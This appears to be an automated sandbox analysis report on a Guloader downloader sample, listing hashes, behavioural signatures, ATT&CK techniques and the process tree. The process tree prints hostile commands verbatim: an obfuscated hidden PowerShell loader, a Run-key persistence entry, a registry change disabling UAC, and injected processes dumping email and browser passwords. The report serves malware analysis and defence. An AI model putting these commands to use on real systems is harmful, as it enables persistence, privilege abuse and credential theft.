Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09-07-2024 11:11
Static task
static1
Behavioral task
behavioral1
Sample
MalwareBazaar.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
MalwareBazaar.exe
Resource
win10v2004-20240704-en
General
-
Target
MalwareBazaar.exe
-
Size
387KB
-
MD5
06e45d2db3c52517fc7139b3b32a4742
-
SHA1
602ab4e85c1506af02d51e144298bac3aea331ca
-
SHA256
9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f
-
SHA512
32e1131c14136721d872ea13736fe7041d8d7e09a1efac363a4bc1d29a9bcd4fcfc8e523cf689386a7e8fe67100194211a1ea9934f7fde5f241df77adcdb61bd
-
SSDEEP
12288:3GqS6hqE06uAyNOcSN6dJjfJ1mPaxm5Bj3O9X:3GqS6hb0Kd4FBcixmBje9
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/776-75-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/4116-69-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 3 IoCs
Processes:
resource yara_rule behavioral2/memory/776-75-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/2956-71-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/4116-69-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\\Ufrugtbarhedens\\').quadricapsular;%Grshoppens% ($nedstemmes)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 1784 wab.exe 1784 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 4388 powershell.exe 1784 wab.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exewab.exedescription pid process target process PID 4388 set thread context of 1784 4388 powershell.exe wab.exe PID 1784 set thread context of 4116 1784 wab.exe wab.exe PID 1784 set thread context of 776 1784 wab.exe wab.exe PID 1784 set thread context of 2956 1784 wab.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exewab.exewab.exepid process 4388 powershell.exe 4388 powershell.exe 4388 powershell.exe 4388 powershell.exe 4388 powershell.exe 4388 powershell.exe 4388 powershell.exe 4388 powershell.exe 4388 powershell.exe 4116 wab.exe 4116 wab.exe 2956 wab.exe 2956 wab.exe 4116 wab.exe 4116 wab.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exewab.exepid process 4388 powershell.exe 1784 wab.exe 1784 wab.exe 1784 wab.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewab.exedescription pid process Token: SeDebugPrivilege 4388 powershell.exe Token: SeDebugPrivilege 2956 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wab.exepid process 1784 wab.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
MalwareBazaar.exepowershell.exewab.execmd.execmd.exedescription pid process target process PID 4400 wrote to memory of 4388 4400 MalwareBazaar.exe powershell.exe PID 4400 wrote to memory of 4388 4400 MalwareBazaar.exe powershell.exe PID 4400 wrote to memory of 4388 4400 MalwareBazaar.exe powershell.exe PID 4388 wrote to memory of 1784 4388 powershell.exe wab.exe PID 4388 wrote to memory of 1784 4388 powershell.exe wab.exe PID 4388 wrote to memory of 1784 4388 powershell.exe wab.exe PID 4388 wrote to memory of 1784 4388 powershell.exe wab.exe PID 4388 wrote to memory of 1784 4388 powershell.exe wab.exe PID 1784 wrote to memory of 2656 1784 wab.exe cmd.exe PID 1784 wrote to memory of 2656 1784 wab.exe cmd.exe PID 1784 wrote to memory of 2656 1784 wab.exe cmd.exe PID 2656 wrote to memory of 3496 2656 cmd.exe reg.exe PID 2656 wrote to memory of 3496 2656 cmd.exe reg.exe PID 2656 wrote to memory of 3496 2656 cmd.exe reg.exe PID 1784 wrote to memory of 896 1784 wab.exe cmd.exe PID 1784 wrote to memory of 896 1784 wab.exe cmd.exe PID 1784 wrote to memory of 896 1784 wab.exe cmd.exe PID 896 wrote to memory of 4616 896 cmd.exe reg.exe PID 896 wrote to memory of 4616 896 cmd.exe reg.exe PID 896 wrote to memory of 4616 896 cmd.exe reg.exe PID 1784 wrote to memory of 4116 1784 wab.exe wab.exe PID 1784 wrote to memory of 4116 1784 wab.exe wab.exe PID 1784 wrote to memory of 4116 1784 wab.exe wab.exe PID 1784 wrote to memory of 4116 1784 wab.exe wab.exe PID 1784 wrote to memory of 776 1784 wab.exe wab.exe PID 1784 wrote to memory of 776 1784 wab.exe wab.exe PID 1784 wrote to memory of 776 1784 wab.exe wab.exe PID 1784 wrote to memory of 776 1784 wab.exe wab.exe PID 1784 wrote to memory of 2956 1784 wab.exe wab.exe PID 1784 wrote to memory of 2956 1784 wab.exe wab.exe PID 1784 wrote to memory of 2956 1784 wab.exe wab.exe PID 1784 wrote to memory of 2956 1784 wab.exe wab.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Metabolizable=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Emptyhanded.Sla139';$Kumpan=$Metabolizable.SubString(7195,3);.$Kumpan($Metabolizable)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\Ufrugtbarhedens\').quadricapsular;%Grshoppens% ($nedstemmes)"4⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\Ufrugtbarhedens\').quadricapsular;%Grshoppens% ($nedstemmes)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:3496 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:4616 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wlbajicggjhdvpqkjgfsqomgqjtmp"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4116 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hfptjamzurzhxweosrrutbhxrqdnqnxy"4⤵
- Accesses Microsoft Outlook accounts
PID:776 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rhul"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5b8106f495ecb8e1a54dc765f9b78ac30
SHA18e2d77b515e16dba8fa67103952aadbb56069883
SHA256cd6a44f81a261fdc4d4f5a61dae4c046b02cd23f1e08b9671f5870364824953b
SHA512240751ece330f8fcdb078e134d9b231e01d9e238de928d4b57727eea371b78775426cd09bbd6884145ef48ea7e37741655377215467a5a215c4460338e810b2c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5f5c7d652e408753fba07ef2069ab8a13
SHA19815cd1ae93306cdacabf573ad54f1ef970b3913
SHA2566734744077bca26577abb89d0b811bef713c2a97e7fcc70888d4990d500fa67a
SHA51243570265f839d5e435c83052501c24ed182bda5a3a9db0f6eb519c251af85dafa10825a3995c66e1e88a7bcbcf9c7dcbbd2f24d661c05b7f20f5aa35f536bc80
-
Filesize
65KB
MD567cb075314762a89035c6b2b15c68f00
SHA1382134aa018f620cdfbab89a67ae7c10b22e8547
SHA256a853d35e1301ceef0526d96852cf8ed766c3d9f04bc5a7b49522b02d1b4302ea
SHA5125677a3b68f751f9cb252d45aa35f4609fe0f81c734b3ed44ddb2acd8e017c371027841892f61a7aa71debe950b2b7ea05ecdbfe577130c69a8d74c74cbaf4190
-
Filesize
325KB
MD5b9207704502bf9bc8956ea19f761c559
SHA1dee462bb9bff33881c21ce2f8615a222cbb28aa2
SHA256ea7565fe3b1b2fa90145b41406c2b175846785ba1be2d0248030dedbdd4aec6f
SHA512cba66f601051aaee865574f94996c480873017195c122d750f7355a777359ec0ba05b5f786c88753c7e3b87a01daeae82edba1d3a799e09e28f7ef8bc1f6d704